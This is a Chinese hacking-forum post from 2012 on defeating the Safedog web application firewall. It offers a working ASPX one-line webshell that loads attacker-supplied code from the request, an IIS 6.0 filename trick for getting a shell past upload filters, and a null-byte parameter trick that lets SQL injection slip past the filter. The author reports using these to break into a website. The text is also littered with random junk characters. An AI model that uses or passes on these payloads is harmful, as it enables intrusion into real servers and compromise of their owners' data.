找回密码
 立即注册
查看: 2725|回复: 0
打印 上一主题 下一主题

突破安全狗防注入及上传的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-31 08:25:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、绕过IIS安全狗的一句话。
' b) |" F8 F& O前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
$ F5 ]( g, Z$ g9 Z9 z( Z. u; @<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。. ]- Y% P% n' r; y8 v1 q
/ ?5 F' t+ _& }$ Z9 M
2、IIS6.0解析漏洞遇到安全狗。
" g) ]# X0 e. d文件名为( |0 x$ k8 S# y
http://www.xxxxx.com/sh3llc0de.asp;1.jpg3 h' i  Z4 y( k5 N; `

8 E5 _+ S* R/ y# |6 F这样的会被IIS安全狗果断屏蔽。1 R' `% e$ _) e+ J6 F
改成如下名称,IIS6一样会解析:( Y" `' n  O9 Q" P
www.xxxxx.com/;1.asp;1.jpg5 R' e) |& G. R3 x2 ^
* `2 h+ Q2 R9 A1 F" F3 u
3、安全狗的注入绕过。! }& H" F0 x9 R9 P
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。% N6 @% y) s' K1 c- v
但如果:
  }5 o6 t: n" L& gr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1& H2 x3 V5 `, V
就可以成功绕过了。
, O2 e  ~+ J) C: ~9 c" }9 U
) n; F# l5 P9 u# g% P$ W- K# v- N
; l4 A: J8 z2 w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表